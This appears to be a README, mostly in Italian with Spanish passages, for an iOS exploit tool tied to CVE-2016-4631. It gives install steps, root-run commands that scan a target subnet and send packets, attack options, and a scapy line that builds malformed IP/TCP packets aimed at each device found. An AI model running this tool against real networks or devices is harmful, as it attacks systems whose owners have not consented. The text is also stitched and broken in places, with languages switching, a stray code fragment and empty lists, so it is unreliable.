
Exploit PoC modernizzato in Python 3 per CVE-2016-4631 destinato a dispositivi iOS. Include scansione di rete, generazione di payload IP/TCP malformati e iniezione di pacchetti per test di sicurezza autorizzati e scopi educativi.
¿Perché pubblico questo ora?
Mentre rivedevo vecchi dischi rigidi e repository dimenticati, mi sono imbattuto in questo script che ho scritto anni fa quando stavo appena iniziando la mia carriera nella cybersecurity. Era un'epoca diversa - Python 2.7 dominava, vulnerabilità come CVE-2016-4631 erano all'ordine del giorno, e ogni PoC funzionante sembrava una piccola vittoria.
Nel rivedere questo codice dopo così tanto tempo, non ho potuto evitare di sentire nostalgia. Ho ricordato quelle notti passate a debuggare exploit, l'emozione di vedere "Payload sent successfully", e come ogni script fosse un passo avanti nel mio apprendimento. Anche se oggi lavoro con tecnologie molto più avanzate, questo piccolo script rappresenta quei primi passi nel mondo della sicurezza offensiva.
Ho deciso di modernizzarlo e condividerlo non solo per nostalgia, ma perché credo che possa essere utile ad altri che stanno iniziando il loro percorso nella cybersecurity. È un promemoria del fatto che tutti iniziamo da qualche parte, e che quei primi script "semplici" sono la base di tutto ciò che viene dopo.
F0LloW_Th3_R4ts era la mia firma di allora... alcuni codici non si dimenticano mai. 🐀
- BONKERS, Luglio 2025
FuxIOS.py è un Proof of Concept (PoC) aggiornato per la vulnerabilità CVE-2016-4631 che colpisce i dispositivi iOS. Questa versione è stata completamente riscritta e modernizzata per Python 3 con miglioramenti significativi in funzionalità, sicurezza e usabilità.
list_of_ips → list_ips# Instalar nmap (requerido por python-nmap)
# Windows: Descargar desde https://nmap.org/download.html
# Linux: sudo apt-get install nmap
# macOS: brew install nmap
# Clonar repositorio
git clone <repo-url>
cd FuxiOS
# Instalar dependencias
pip install -r requirements.txt
# O manualmente:
pip install scapy python-nmap
# Uso básico
sudo python3 FuxIOS.py
# Configuración personalizada
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24
# Opciones avanzadas
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24 -m 50 -d 0.1
# Ver ayuda
python3 FuxIOS.py -h
sudo python3 FuxIOS.py --interactive
-s, --source: IP di origine dell'attacco (default: 192.168.1.95)-n, --network: Subnet obiettivo (default: 192.168.1.0/24)-m, --max-payload: Dimensione massima del payload (default: 40)-d, --delay: Ritardo tra i pacchetti in secondi (default: 0.2)--interactive: Modalità interattiva per compatibilità# Paquete malicioso
IP(src=source_ip, dst=target_ip, options=malformed_payload) /
TCP(dport=80, flags="S", options=[(19, b"x"*18), (19, b"x"*18)])
Questo tool deve essere utilizzato esclusivamente per:
I log vengono salvati in fuxios_exploit.log e includono:
Error: "No module named 'scapy'"
pip install scapy
Error: "No module named 'nmap'"
pip install python-nmap
# Y asegúrate de tener nmap instalado en el sistema
Error: "Permission denied"
# Linux/macOS
sudo python3 FuxIOS.py
# Windows
# Ejecutar PowerShell/CMD como administrador
Windows: "WinPcap/Npcap not found"
Questo progetto è solo a scopo educativo. L'autore non è responsabile dell'uso improprio di questo strumento.
Ricorda: "F0LloW_Th3_R4ts <:8)~~ <:8)~~"